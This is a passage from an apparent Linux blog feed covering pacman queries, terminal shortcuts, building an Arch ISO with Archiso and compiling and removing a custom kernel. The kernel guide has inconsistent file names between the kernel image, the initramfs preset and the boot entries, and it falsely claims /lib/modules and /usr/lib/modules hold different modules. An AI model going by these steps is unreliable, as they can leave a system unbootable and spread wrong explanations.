Description     : The Linux kernel and modules
Architecture    : x86_64
URL             : https://github.com/archlinux/linux/commits/v6.4.12-arch1
Licenses        : GPL2
Groups          : None
...
```

To search for packages that match a particular term in their names or descriptions, use:

```shell
$ pacman -Qs linux
local/alsa-lib 1.2.9-1
    An alternative implementation of Linux sound support
local/arch-install-scripts 28-1
    Scripts to aid in installing Arch Linux
local/archiso 71-1
    Tools for creating Arch Linux live and install iso images
local/archlinux-keyring 20230821-1
    Arch Linux PGP keyring
local/avahi 1:0.8+r22+gfd482a7-1
    Service Discovery for Linux using mDNS/DNS-SD (compatible with Bonjour)
...
```

### Non-installed and Installed Packages

For a broader search that encompasses both package names and descriptions, try:

```shell
pacman -Ss linux
```

The output will display packages that match the search term, along with their descriptions and installation status.

To view detailed information about a package available in the remote repository, use:

```shell
pacman -Si linux
```

This command provides comprehensive information about a specific package, including its repository, version, description, architecture, URL, licenses, and more.

## Conclusion

Becoming proficient with the Pacman package manager is a fundamental skill for any Arch Linux user. The commands outlined in this guide will empower you to install, upgrade, and manage packages seamlessly, ensuring your system remains current and efficient. As you delve deeper into the Arch Linux ecosystem.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Super Handy Linux Command Tips That Will Transform Your Terminal Experience</title><link>https://ummit.dev//posts/linux/tools/terminal/terminal-skill/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/terminal/terminal-skill/</guid><description>Unlock the true potential of the Linux terminal with these 21 command tips that can revolutionize your productivity and efficiency.</description><pubDate>Mon, 28 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

The Linux terminal is a remarkable tool that empowers users to interact with their systems in a powerful and efficient manner. Whether you&apos;re a seasoned developer, a system administrator, or a curious enthusiast, mastering the art of the terminal can significantly boost your productivity and make your daily tasks smoother. In this guide, we&apos;ll delve into a collection of 21 super handy Linux command tips that are poised to revolutionize your terminal experience and transform the way you work.

### Commands for Daily Use

#### Autocompletion with Tab

Save valuable time by harnessing the power of the Tab key for autocompletion. When typing commands or file paths, simply press Tab to let the terminal automatically complete the rest or provide you with a list of possible options.

```shell
Press TAB
```

#### Switch Back to the Last Working Directory

Effortlessly navigate back to your previous working directory by typing `cd -`. This nifty shortcut is particularly useful when you&apos;re shuffling between two directories.

```shell
cd -
```

#### Return to the Home Directory

Swiftly return to your home directory with the command `cd ~`. This is a quick way to jump back to your starting point.

```shell
cd ~
```

####  Run Multiple Commands in One Line

Combine multiple commands in a single line by using semicolons (;) to separate them. For example:

```shell
command1; command2; command3
```

#### Run Commands Sequentially

Execute commands sequentially using double ampersands (&amp;&amp;), ensuring that each subsequent command runs only if the previous one was successful:

```shell
command1 &amp;&amp; command2
```

#### Jump to the Beginning or End of a Line

Move the cursor to the start of a line with `Ctrl + A` and to the end with `Ctrl + E`.

```shell
Press Ctrl + A
Press Ctrl + E
```

#### Interrupt a Command

Halt or cancel a running command by pressing `Ctrl + C`.

```shell
Press Ctrl + C
```

#### Cancel the Current Line

Erase the current line from the cursor to the beginning using `Ctrl + U`.

```shell
Press Ctrl + U
```

#### Delete the Part Before the Cursor

Eliminate the word before the cursor with `Ctrl + W`.

```shell
Press Ctrl + W
```

#### Paste from the Clipboard

To paste text from the clipboard, utilize `Ctrl + Shift + V`.

```shell
Press Ctrl + Shift + V
```

#### Quickly Clear the Terminal

Type `clear` to swiftly clear the terminal screen.

```shell
clear
```

#### Repeating the Previous Command

Recall and edit previous commands using the `Up` arrow key. Press `Enter` to execute.

```shell
arrow key (Up or down)
```

#### Repeating the Last Argument

Recall the last argument from the previous command with `Alt + .`.

```shell
Press Alt + .
```

#### Creating Directories and Parent Directories

Simplify directory creation by using `mkdir -p` to generate directories along with their parent directories.

```shell
mkdir -p /folder1/folder2/folder3/
```

### Commands for Development

#### Recall Specific Arguments

Retrieve specific arguments from the previous command using `Alt + 1`, `Alt + 2`, and so on.

```shell
Alt + 1
Alt + 2
...
```

#### Use the Man Page

Access detailed information about a command by typing `man command` to open its manual page.

```shell
man chmod
```

#### Search History with Ctrl + R

Search through your command history by pressing `Ctrl + R` and typing your query.

```shell
Press Ctrl + R
```

### Commands for Execution

#### Redirect Output to a File

Redirect command output to a file with `&gt;` to overwrite the file if it exists:

```shell
cat overwrite_this &gt; file.txt
```

#### Append Output to a File

Redirect command output and append it to a file using `&gt;&gt;`:

```shell
cat add_lines_here &gt;&gt; file.txt
```

### For Debugging: Reading a Log File in Real Time

When troubleshooting and debugging, it&apos;s often crucial to monitor log files in real time to gain insights into what&apos;s happening within your application. The `tail` command with the `-f` option is an invaluable tool for this purpose.

#### Reading Logs in Real Time

To monitor a log file as it&apos;s being updated, use the `tail -f` command followed by the path to the log file:

```shell
tail -f path_to_log
```

As new log entries are written to the file, they&apos;ll be displayed in your terminal in real time. This is particularly useful for tracking events as they happen and identifying issues as they arise.

#### Filtering Relevant Information

Logs can often be verbose, containing a lot of information that might not be immediately relevant to your debugging efforts. You can enhance your log monitoring experience by combining `tail -f`

 with the `grep` command to filter out specific lines based on search terms:

```shell
tail -f path_to_log | grep search_term
```

In this command, replace `search_term` with the keyword you&apos;re looking for in the log entries. This will narrow down the displayed output to only show the lines containing the specified term.

#### Ensuring Persistent Monitoring

Sometimes, log files might be rotated or deleted as part of the application&apos;s logging process. To ensure continuous monitoring even when the log file is deleted and recreated, you can use the `-F` option instead of `-f`:

```shell
tail -F path_to_log
```

With this option, `tail` will continue monitoring the file even if it&apos;s removed and re-created, allowing you to maintain an uninterrupted view of the log data.

## Conclusion

These Linux command tips are just the tip of the iceberg when it comes to maximizing your terminal experience. As you become more comfortable with the terminal, you&apos;ll uncover countless ways to streamline your tasks, automate processes, and become a more proficient and efficient Linux user.

## References

- [21 Super Handy Linux Command Tips and Tricks That Will Save you a lot of Time and Increase Your Productivity](https://itsfoss.com/linux-command-tricks/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Building Your Own Custom Arch Linux ISO with Archiso</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-build-your-own-kernel-archlinux_iso/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-build-your-own-kernel-archlinux_iso/</guid><description>Explore the process of creating a personalized Arch Linux ISO using the official tool called Archiso to craft your own customized Arch Linux ISO.</description><pubDate>Sun, 27 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## What is Archiso?

Archiso is the official tool used to build the Arch Linux live CD/USB ISO images. It&apos;s a versatile utility that allows you to construct bootable ISO images that can be used for various purposes, from system recovery to creating your own personalized Arch Linux distribution or even your own Arch based Distribution.

## Why Archiso?

Have you ever wanted to create your own custom Arch Linux ISO image, tailored to your specific needs and preferences? With Archiso, a powerful and highly customizable tool, you can do just that. Whether you&apos;re building a rescue system, a Linux installer, or a specialized distribution, Archiso provides the framework to create ISO images that perfectly suit your requirements.

### Install Archiso

To start using Archiso, you need to install the package first.

```shell
sudo pacman -S archiso
```

### Create Working Directory

You will need a working directory to store your customizations and configurations. Create a dedicated directory where you&apos;ll carry out the customization process:

```shell
mkdir archlive
```

### Copy Your Configuration Files

To create a custom Arch Linux ISO, you&apos;ll need to copy the configuration files from the `/usr/share/archiso/configs/releng/` directory to your working directory. These files serve as the foundation for your custom ISO and contain essential settings and configurations. So that why you will need one arch linux system to copy the configuration files.

```shell
cp -r /usr/share/archiso/configs/releng/ archlive
```

### Building Arch Linux ISO

You can now start building your custom Arch Linux ISO by running the `mkarchiso` command. This command will generate the ISO image based on the configurations and settings you&apos;ve defined in the `releng` directory.

To build your own Arch Linux ISO, create an `output` directory for the final image and a `work` directory for temporary files, then run `mkarchiso -v -o output work`, and if you need to rebuild, just delete the `work` directory and start the process again.

```shell
cd archlive
mkdir output work
```

And now you can start building the ISO by using the `mkarchiso` command.

```shell
sudo mkarchiso -v -w work -o output releng
```

### Monitor the Build Progress

During the ISO creation process, you&apos;ll see various messages indicating the progress of the build. These messages provide insights into the different stages being completed, such as package installation, file copying, and ISO generation.

The result will be like:

```shell
Written to medium : 408230 sectors at LBA 0
Writing to &apos;stdio:/home/username/your/path/here/archlive/output/archlinux-2023.08.27-x86_64.iso&apos; completed successfully.
[mkarchiso] INFO: Done!
798M  /home/username/your/path/here/archlive/output/archlinux-2023.08.27-x86_64.iso
```

### Testing Your Custom Arch Linux ISO

The next step is to test your creation to ensure that it functions as intended. This testing phase allows you to identify any issues or discrepancies that may arise when booting the ISO on various systems. To facilitate this testing, you&apos;ll need to use the QEMU program along with the `qemu-desktop` package and the `edk2-ovmf` package for UEFI support (Firmware for Virtual Machines). install the required packages by executing the following command:

The testing environment can be form BIOS to UEFI mode, so you can test your ISO in both modes. To test your custom Arch Linux ISO in UEFI mode, follow these steps:

```shell
sudo pacman -S qemu-desktop edk2-ovmf
```

#### UEFI Mode Testing

To test your custom Arch Linux ISO in UEFI mode, use the following command:

 ```shell
run_archiso -u -i archlinux-2023.08.27-x86_64.iso
```

![UEFI Mode](./UEFI_test.png)

#### BIOS (Non-UEFI) Mode Testing

To test your custom Arch Linux ISO in BIOS mode, use the following command:

```shell
run_archiso -i archlinux-2023.08.27-x86_64.iso
```

![BIOS Mode](./BIOS_test.png)

### Customizing Your Arch Linux ISO Packages

One of the key benefits of creating a custom Arch Linux ISO is the ability to include specific packages that align with your needs and preferences. You can customize the list of packages included in your ISO by editing the `packages.x86_64` file located in the `releng` directory. This file contains a list of packages that will be installed on the ISO image.

```shell
nvim releng/packages.x86_64
```

## Conclusion

In this guide, you&apos;ve learned how to build your own custom Arch Linux ISO using the powerful `mkarchiso` tool. By following the steps outlined in this tutorial, you&apos;ve gained the ability to create an ISO image that perfectly aligns with your needs and preferences. This process empowers you to customize the Arch Linux experience to a level that the official ISOs might not offer.

This also is a great way to start creating your very own Arch-based distribution, tailored to your specific requirements. Whether you&apos;re building a specialized system, a rescue disk, or a Linux installer, Archiso provides the flexibility and control you need to create a custom Arch Linux ISO that meets your unique needs.

## Resources

- [Archiso](https://wiki.archlinux.org/title/archiso)
- [Arch Linux: Create Your Own Installer](https://www.youtube.com/watch?v=-yPhW5o1hNM)
- [Build Your Own Distro With Archiso](https://www.youtube.com/watch?v=tSGGBbJBgvk)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Building your customized Linux Kernel</title><link>https://ummit.dev//posts/linux/kernel/build-your-custom-kernel/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/kernel/build-your-custom-kernel/</guid><description>Learn how to build your own custom Linux kernel from scratch on your Linux system (systemd-boot). Follow this step-by-step guide to gain insight into kernel customization and enhance your system&apos;s performance and features.</description><pubDate>Tue, 22 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Building a custom Linux kernel on Arch Linux might appear intimidating at first, but armed with the right knowledge, it becomes an empowering skill. This tutorial is designed to guide you through the process, simplifying each step with clear and straightforward commands.

## August 24, 2023

Throughout this tutorial, we&apos;ll use Linux kernel version 6.4.12 as an example. Keep in mind that you can adapt the steps for different kernel versions as needed.

Let&apos;s dive in and demystify the process of crafting your very own custom Linux kernel on Arch Linux.

## Step 1: Prepare Your System

Before delving into building the custom Linux kernel, it&apos;s essential to ensure your system is equipped with the necessary tools and packages. Follow these steps to prepare your system:

### Install Required Dependencies and Additional Packages

To ensure a smooth and successful kernel compilation process, it&apos;s essential to install both the required base development tools and additional packages that contribute to various aspects of building your custom Linux kernel on Arch Linux.

1. **Install Base Development Tools:**

Start by installing the `base-devel` meta package, which includes fundamental tools like `make` and `gcc`. Open a terminal and enter the following command:

```shell
sudo pacman -S base-devel
```

2. **Install Additional Packages:**

To further streamline the kernel compilation process and meet all prerequisites for building your custom Linux kernel, it&apos;s highly recommended to install the following additional packages:

```shell
sudo pacman -S xmlto kmod inetutils bc libelf git cpio perl tar xz
```

Each of these packages serves a specific purpose in the kernel build process:

- **xmlto**: Transforms XML documents into various formats such as HTML and PDF, used for kernel documentation generation.
- **kmod**: Provides utilities for managing kernel modules, including loading and unloading.
- **inetutils**: Offers common networking utilities like `ping` and `ifconfig`, helpful for kernel troubleshooting.
- **bc**: A command-line calculator with precision arithmetic, often used for calculations in kernel build scripts.
- **libelf**: A library for reading and writing ELF files, essential for working with executable and object files.
- **git**: Distributed version control system used for tracking kernel source code changes.
- **cpio**: Creates and extracts archive files, crucial for building `initramfs` images.
- **perl**: Programming language used in various scripting tasks, sometimes involved in the kernel build process.
- **tar**: Utility for creating and manipulating archive files, useful for packaging components of the kernel source code.
- **xz**: Compression utility for efficient file compression and decompression, vital for managing compressed files in the kernel build.

By installing both the base development tools and these additional packages, you ensure that your system is well-equipped to successfully compile, build, and customize your own Linux kernel on Arch Linux. This comprehensive approach minimizes potential issues during the kernel compilation process and helps you achieve your custom kernel with confidence.

## Step 2: Download the Kernel Source

Embark on your kernel customization journey by obtaining the kernel source code from the official source, kernel.org. The source code is sizeable, typically around 100 MBs or more. Here are a couple of methods to download the source code:

### 1. Visit Kernel.org:

   The official source for Linux kernel releases is [kernel.org](https://kernel.org/). You can access the website through your web browser and manually download the source code archive. Keep in mind that this method involves larger file sizes, so a stable internet connection is recommended.

   ![kernel.org](./Download Kernel source.png)

### 2. Download using `aria2c`:

   To expedite the process, especially considering the large file size, you can use the `aria2c` command-line tool. This command supports multiple connections for faster downloads:
   ```shell
   aria2c -x 16 &quot;https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.4.12.tar.xz&quot;
   ```

### 3. Download using `wget`:

   If you prefer not to use a web browser, you can use the `wget` command-line tool to directly download the source code:
   ```shell
   wget &quot;https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.4.12.tar.xz&quot;
   ```

Remember, whether you choose the efficient `aria2c`, the direct `wget`, or the manual browser download, obtaining the kernel source code from kernel.org is your initial step toward crafting your customized Linux kernel.

## Step 3: Extract the Source Code

Unpack the downloaded source code archive using the `unxz` command:
```shell
unxz -v linux-6.4.12.tar.xz
```

## Step 4: Verify the Signature (Optional)

To ensure the authenticity of the source code, follow these steps to verify its GPG signature:

### 1. Download the Signature File

   Begin by downloading the GPG signature file associated with the source code:
   ```shell
   aria2c -x 16 &quot;https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.4.12.tar.sign&quot;
   ```

### 2. Verify the Signature

   Next, use GPG to verify the signature of the downloaded source code:
   ```shell
   $ gpg --verify linux-6.4.12.tar.sign
   gpg: assuming signed data in &apos;linux-6.4.12.tar&apos;
   gpg: Signature made Wed 23 Aug 2023 11:33:44 PM HKT
   gpg:                using RSA key 647F28654894E3BD457199BE38DBBDC86092693E
   gpg: Can&apos;t check signature: No public key
   ```

### 3. Import the GPG Key

   If the signature verification is successful, import the associated GPG key for future use:
   ```shell
   $ gpg --recv-key 647F28654894E3BD457199BE38DBBDC86092693E
   gpg: key 38DBBDC86092693E: 1 duplicate signature removed
   gpg: key 38DBBDC86092693E: public key &quot;Greg Kroah-Hartman &lt;gregkh@linuxfoundation.org&gt;&quot; imported
   gpg: Total number processed: 1
   gpg:               imported: 1
   ```

### 4. Continue with Signature Confirmation

   Confirm the validity of the imported key against the signature once again:
   ```shell
   $ gpg --verify linux-6.4.12.tar.sign
   gpg: assuming signed data in &apos;linux-6.4.12.tar&apos;
   gpg: Signature made Wed 23 Aug 2023 11:33:44 PM HKT
   gpg:                using RSA key 647F28654894E3BD457199BE38DBBDC86092693E
   gpg: Good signature from &quot;Greg Kroah-Hartman &lt;gregkh@linuxfoundation.org&gt;&quot; [unknown]
   gpg:                 aka &quot;Greg Kroah-Hartman &lt;gregkh@kernel.org&gt;&quot; [unknown]
   gpg:                 aka &quot;Greg Kroah-Hartman (Linux kernel stable release signing key) &lt;greg@kroah.com&gt;&quot; [unknown]
   gpg: WARNING: This key is not certified with a trusted signature!
   gpg:          There is no indication that the signature belongs to the owner.
   Primary key fingerprint: 647F 2865 4894 E3BD 4571  99BE 38DB BDC8 6092 693E
   ```

## Step 5: Extract the Source Code (Continued)

Continuing from where we left off, let&apos;s proceed with extracting the downloaded kernel source code using the following command:

```shell
tar xvf linux-6.4.12.tar
```

This command will unpack the compressed source code archive.

## Step 6: Navigate to the Kernel Source Directory

Navigate to the directory containing the kernel source code. You&apos;ll want to ensure that you have the necessary permissions to work with the source files without constantly relying on `sudo`. Here&apos;s how you can achieve that:

1. **Change Ownership of Kernel Source Directory:**

   To avoid using `sudo` for every operation, change the ownership of the kernel source directory to your user. Replace `$USER` with your actual username:

   ```shell
   chown $USER:$USER linux-6.4.12
   ```

This ensures that you have the necessary access rights to work with the kernel source code and perform various operations without the constant need for superuser privileges.

## Step 7: Compile and Install Kernel

### 1. Navigate to the Kernel Source Directory:

   Move into the directory containing the kernel source code:
   ```shell
   cd linux-6.4.12
   ```

### 2. Configure Using Current Kernel Configuration

Configuring a kernel involves determining various settings and options that tailor the kernel to your system&apos;s hardware and requirements. The kernel configuration dictates which features, drivers, and functionalities will be included in the final compiled kernel. It&apos;s a crucial step in building a custom kernel that aligns with your specific needs.

In this context, the term &quot;configuration&quot; refers to a set of options stored in a file called `.config`. This file contains information about how the kernel should be built, what modules to include, which hardware support to enable, and more. The options can be adjusted through a configuration interface.

To streamline the process of configuring your custom kernel, you can use the configuration from your currently running kernel as a starting point. This ensures that your custom kernel maintains compatibility with your existing hardware and system setup.

The command to copy the configuration from your currently running kernel to the kernel source directory is:

```shell
cp /usr/src/linux/.config .
```

Here, `/usr/src/linux` is a symbolic link to the kernel source directory of your currently installed kernel. The `cp` command duplicates the `.config` file into your working directory, allowing you to use it as a basis for your custom kernel configuration.

```shell
CONFIG_SCSI_MVSAS_TASKLET=y
CONFIG_SCSI_MVUMI=m
CONFIG_SCSI_ADVANSYS=m
CONFIG_SCSI_ARCMSR=m
CONFIG_SCSI_ESAS2R=m
CONFIG_MEGARAID_NEWGEN=y
CONFIG_MEGARAID_MM=m
CONFIG_MEGARAID_MAILBOX=m
CONFIG_MEGARAID_LEGACY=m
CONFIG_MEGARAID_SAS=m
CONFIG_SCSI_MPT3SAS=m
CONFIG_SCSI_MPT2SAS_MAX_SGE=128
CONFIG_SCSI_MPT3SAS_MAX_SGE=128
CONFIG_SCSI_MPT2SAS=m
CONFIG_SCSI_MPI3MR=m
CONFIG_SCSI_SMARTPQI=m
CONFIG_SCSI_HPTIOP=m
CONFIG_SCSI_BUSLOGIC=m
CONFIG_SCSI_FLASHPOINT=y
CONFIG_SCSI_MYRB=m
CONFIG_SCSI_MYRS=m
CONFIG_VMWARE_PVSCSI=m
CONFIG_XEN_SCSI_FRONTEND=m
CONFIG_HYPERV_STORAGE=m
CONFIG_LIBFC=m
CONFIG_LIBFCOE=m
CONFIG_FCOE=m
...
```

It&apos;s worth noting that the kernel configuration is a comprehensive topic on its own, with various options and settings that can significantly impact the behavior and performance of the kernel. Advanced users may explore tools like `make menuconfig`, `make xconfig`, or `make gconfig` to interactively configure the kernel&apos;s options. However, for the purpose of this guide, we&apos;ll focus on using the existing configuration to compile the custom kernel.

### 3. Compile the Kernel

Now that you&apos;ve configured your kernel, it&apos;s time to move on to the compilation phase. Compilation involves translating the human-readable source code into machine-executable instructions that your computer can understand and execute. This step transforms the kernel source code you&apos;ve customized into a functional kernel binary that your system can boot from.

To compile the kernel, you&apos;ll be using the `make` command, which automates the compilation process. Here&apos;s what the command does:

```shell
make ARCH=x86_64 -j $(nproc)
```

   ![compile the kernel](./Compile Kernel Modules.png)

- `make`: This command invokes the kernel build system and starts the compilation process.

- `ARCH=x86_64`: Specifies the target architecture for which you&apos;re compiling the kernel. In this case, it&apos;s the x86_64 architecture.

- `-j $(nproc)`: The `-j` flag tells the compiler to utilize multiple processor cores for parallel compilation, which significantly speeds up the process. `$(nproc)` dynamically determines the number of available processor cores and uses them for compilation.

During compilation, the kernel source code is transformed into multiple object files and then linked together to create the final kernel binary. The `-j` flag ensures that multiple compilation tasks are performed simultaneously, maximizing the efficiency of your system&apos;s processing power.

compilation might take a long time, depending on your hardware and the complexity of your kernel configuration.

### 4. Install Kernel Modules

Once your custom kernel is compiled, it&apos;s crucial to install the associated kernel modules to ensure your system&apos;s optimal functionality. Kernel modules are essential pieces of software that enable your operating system&apos;s kernel to interact with various hardware components, file systems, and system functionalities. Installing these modules correctly is key to a smooth and well-functioning system.

The following command will install the kernel modules for your custom-built kernel:

```shell
sudo make ARCH=x86_64 modules_install
```

   ![install the kernel](./Install Kernel Modules.png)

#### What does this command do?

it performs the following tasks:

1. **Compilation and Installation**: It compiles the kernel modules that were built during the kernel compilation process and installs them onto your system.

2. **Destination Directory**: The modules are installed into the `/lib/modules` directory on your system. This directory is structured to accommodate various kernel versions and their associated modules.

3. **Kernel Version Subdirectory**: Inside `/lib/modules`, a subdirectory is created with the version number of your custom kernel. This ensures that modules for different kernel versions can coexist without conflicts.

4. **Module Files**: Within the version-specific subdirectory, the individual kernel module files are placed. These files contain the code needed to support various hardware and software functionalities.

By installing the kernel modules to the appropriate location, you ensure that your custom kernel can effectively manage your hardware devices, file systems, and other crucial system components. This step is essential for the overall stability and performance of your custom-built Linux kernel.

## Step 8: Copy Your Own Kernel to /boot/

After successfully compiling your custom Linux kernel, it&apos;s essential to make it accessible by copying the necessary files to the `/boot` directory. This ensures that your system recognizes and can boot from the new kernel.

Use the following command to copy the compiled kernel image (`bzImage`) to the /boot directory:

- The `-v` flag is used to display detailed progress while copying.

```shell
sudo cp -v arch/x86_64/boot/bzImage /boot/vmlinuz-custom
```

## Step 9: Create and Configure Kernel Initramfs

The **initramfs** (initial RAM file system) is a temporary file system that&apos;s loaded into memory during the boot process before the root file system is available. It contains essential drivers, binaries, and scripts required for the system to identify and access the root file system. Customizing and generating your own initramfs can be crucial, especially if you&apos;re making changes to your kernel.

### 1. Duplicate and Modify the Preset File

To start customizing your initramfs, begin by duplicating the existing `linux.preset` file for your custom kernel. This file is used by `mkinitcpio` to generate the initramfs. Run the following command to make a copy:

```shell
sudo cp /etc/mkinitcpio.d/linux.preset /etc/mkinitcpio.d/linux-custom.preset
```

### 2. Open the Newly Created `linux-custom.preset`

Open the newly created `linux-custom.preset` file using a text editor of your choice. Within this file, you&apos;ll need to make specific modifications to adapt it for your custom kernel. Locate the relevant lines and adjust them as follows:

```shell
...
ALL_kver=&quot;/boot/vmlinuz-linux-custom&quot;
...
default_image=&quot;/boot/initramfs-linux-custom.img&quot;
...
fallback_image=&quot;/boot/initramfs-linux-custom-fallback.img&quot;
```

For clarity, here&apos;s how the modified section might appear:

```shell
# mkinitcpio preset file for the &apos;linux-custom&apos; package

#ALL_config=&quot;/etc/mkinitcpio.conf&quot;
ALL_kver=&quot;/boot/vmlinuz-linux-custom&quot;
ALL_microcode=(/boot/*-ucode.img)

PRESETS=(&apos;default&apos; &apos;fallback&apos;)

#default_config=&quot;/etc/mkinitcpio.conf&quot;
default_image=&quot;/boot/initramfs-linux-custom.img&quot;
#default_uki=&quot;/efi/EFI/Linux/arch-linux.efi&quot;
#default_options=&quot;--splash /usr/share/systemd/bootctl/splash-arch.bmp&quot;

#fallback_config=&quot;/etc/mkinitcpio.conf&quot;
fallback_image=&quot;/boot/initramfs-linux-custom-fallback.img&quot;
#fallback_uki=&quot;/efi/EFI/Linux/arch-linux-fallback.efi&quot;
fallback_options=&quot;-S autodetect&quot;
```

Adjust these values according to your kernel version and naming conventions.

### 3. Generate the Custom Initramfs

Finally, generate the custom initramfs using the modified preset file:

```shell
sudo mkinitcpio -p linux-custom
```

This command will build the initramfs based on your custom configuration.

By creating and configuring your own initramfs, you ensure that essential components required for the boot process are tailored to your custom kernel. This step further enhances the compatibility and stability of your customized Linux kernel configuration.

## Step 10: Create a Boot Loader Configuration

You&apos;ve done the hard work, and now it&apos;s time to ensure your custom kernel is properly loaded during boot. This involves creating a boot loader configuration file. If you&apos;re using systemd-boot, follow these steps:

### 1. Edit Boot Loader Configuration
   Use your favorite text editor to create or modify your boot loader&apos;s configuration file. In the case of systemd-boot, the configuration file is typically located at `/boot/loader/entries/arch-custom.conf`:
   ```shell
   sudo nano /boot/loader/entries/arch-custom.conf
   ```

### 2. Add Configuration
   Insert the following lines into the configuration file to define your custom kernel:
   ```shell
   title Arch Linux Custom
   linux /vmlinuz-linux-custom
   initrd /initramfs-linux-custom.img

   options root=/dev/sda2 quiet ro
   ```

### 3. Save and Exit
   Save the file and exit the text editor.

### 4. Update Boot Loader

Updating your boot loader configuration is a crucial step to ensure that your newly compiled custom kernel is recognized and can be booted. While this step is usually necessary, there&apos;s a tip that might save you some effort.

In many cases, boot loaders like systemd-boot automatically detect new kernel entries and update the boot menu accordingly. This means that after copying your custom kernel to the /boot directory, you might not need to manually update the boot loader configuration. The boot loader should automatically include the new entry during the next boot.

However, if you&apos;re using a boot loader that doesn&apos;t automatically update its configuration, you can follow these steps to manually update it:

1. Open a terminal and enter the following command to update your boot loader configuration:
   ```shell
   sudo bootctl update
   ```

This command ensures that your boot loader is aware of the new kernel entry and includes it in the boot menu options.

## Final Step: Reboot and Verify Your Custom Kernel

Congratulations! You&apos;ve successfully compiled and Installed your own custom Linux kernel. The process might have taken some time and effort, but now you have a tailored kernel that fits your system&apos;s requirements. Let&apos;s take the final steps to reboot your computer and ensure that your new custom kernel is up and running.

### 1. Reboot Your System

To apply the changes and boot into your new custom kernel, issue the following command:

```shell
sudo reboot
```

Executing this command will initiate a system reboot, allowing you to select your custom kernel from the bootloader menu.

### 2. Verify the New Kernel

Once your system has rebooted and you&apos;ve selected your custom kernel from the bootloader, it&apos;s time to verify that everything is in order. Open a terminal and enter the following command to check the version of your newly installed custom kernel:

```shell
uname -mrs
```

#### 2.2 New Kernel Output

You should see output similar to the following, indicating your new Linux kernel version:

```shell
Linux 6.4.12 x86_64
```

This confirms that your custom kernel is now successfully running on your Arch Linux system.

## Deleting a Custom Kernel (If you need)

While customizing your Linux system can be exciting, there may come a time when you need to clean up and remove certain components, such as a custom kernel. Whether you&apos;re making space or simplifying your setup, deleting a custom kernel involves a few straightforward steps.

### Why Remove a Custom Kernel?

Custom kernels can be beneficial for fine-tuning your system&apos;s performance, enabling specific features, or testing new functionalities. However, as your system evolves, you might find that you no longer need a particular custom kernel or want to revert to the default kernel provided by your Linux distribution. Removing a custom kernel can help streamline your system and free up disk space.

### Step 1: Identify the Custom Kernel

Before you proceed with deletion, identify the custom kernel you wish to remove. You&apos;ll need to know its version number and any associated files.

```shell
ls -la /boot
```

### Step 2: Boot into a Different Kernel

To safely delete a custom kernel, it&apos;s advisable to boot into a different kernel version. This ensures that the kernel you&apos;re attempting to delete is not currently in use, reducing the risk of destabilizing your system.

### Step 4: Remove Configuration Files

In addition to cleaning up the kernel-related files, it&apos;s important to remove the associated configuration files that were created during the installation of the custom kernel. This step ensures that your system no longer references the custom kernel. Here&apos;s what you need to do:

1. **Remove the Preset File:**

   Locate and remove the preset file associated with the custom kernel. This file is used by the `mkinitcpio` tool to generate the initial RAM disk image. Open a terminal and enter the following command:

   ```shell
   sudo rm -v /etc/mkinitcpio.d/linux-custom.preset
   ```

   This removes the configuration file used for creating the initramfs image for the custom kernel.

2. **Remove the Boot Loader Entry:**

   If you added a custom boot loader entry for the custom kernel, you should remove it to prevent any reference to the kernel during the boot process. Run the following command to remove the boot loader entry file:

   ```shell
   sudo rm -v /boot/loader/entries/linux-custom.conf
   ```

   This ensures that your boot loader menu no longer lists the custom kernel as an option.

By removing these configuration files, you&apos;re ensuring that your system no longer retains any traces of the custom kernel. This step completes the process of removing the custom kernel from your system, freeing up resources and streamlining your setup.

### Step 5: Remove Kernel Modules

After deleting the kernel-related files, it&apos;s important to remove the associated kernel modules from both `/lib/modules` and `/usr/lib/modules`. Kernel modules are essential components that extend the functionality of the Linux kernel. Removing the modules associated with the custom kernel ensures that no remnants are left behind. Here&apos;s how to do it:

1. **Remove Modules in `/lib/modules`:**

   - Open a terminal and navigate to the `/lib/modules` directory:

     ```shell
     cd /lib/modules
     ```

   - List the directories in this location to find the directory associated with the custom kernel version:

     ```shell
     ls
     ```

   - Remove all files and directories within this directory:

     ```shell
     sudo rm -rfv 6.4.12
     ```

2. **Remove Modules in `/usr/lib/modules`:**

   - Similarly, navigate to the `/usr/lib/modules` directory:

     ```shell
     cd /usr/lib/modules
     ```

   - List the directories to find the one corresponding to the custom kernel version:

     ```shell
     ls
     ```

   - Delete all files and directories within this directory:

     ```shell
     sudo rm -rfv 6.4.12
     ```

By removing kernel modules from both `/lib/modules` and `/usr/lib/modules`, you&apos;re ensuring a clean removal of the custom kernel from your system. This step completes the process, freeing up resources and streamlining your setup.

**Understanding `/lib/modules` and `/usr/lib/modules`:**

The directories `/lib/modules` and `/usr/lib/modules` serve the same purpose but have different locations in the file system.

- `/lib/modules`: This directory contains the kernel modules that are essential for the system&apos;s boot process. Modules in this directory are required early in the boot process when the root file system may not yet be fully available. Placing them here ensures that they are accessible even during the early stages of boot.

- `/usr/lib/modules`: This directory contains additional kernel modules that are not essential for the initial boot process but may be needed later during system operation. Modules in this directory are typically loaded on-demand as needed by the system.

The reason for having these separate directories is to optimize the boot process. By keeping only the essential modules in `/lib/modules`, the boot process can be faster and more reliable. Additional modules are stored in `/usr/lib/modules` to keep the initial boot as lean as possible.

When you remove a custom kernel, it&apos;s a good practice to check both locations (`/lib/modules` and `/usr/lib/modules`) to ensure that all associated modules are removed. make sure no remnants of the custom kernel remain on your system.

### Step 6: Update the Bootloader (Optional)

Updating the bootloader configuration is an optional step, but it&apos;s recommended for ensuring that your system accurately reflects the changes you&apos;ve made. While modern bootloaders like `bootctl` are often smart enough to automatically detect changes to configuration files, manually updating the bootloader provides an extra layer of assurance. Here&apos;s how you can do it:

   &gt; **Note:** Modern bootloaders are designed to automatically detect changes to boot entries and configuration files. However, manually updating the bootloader provides additional peace of mind.

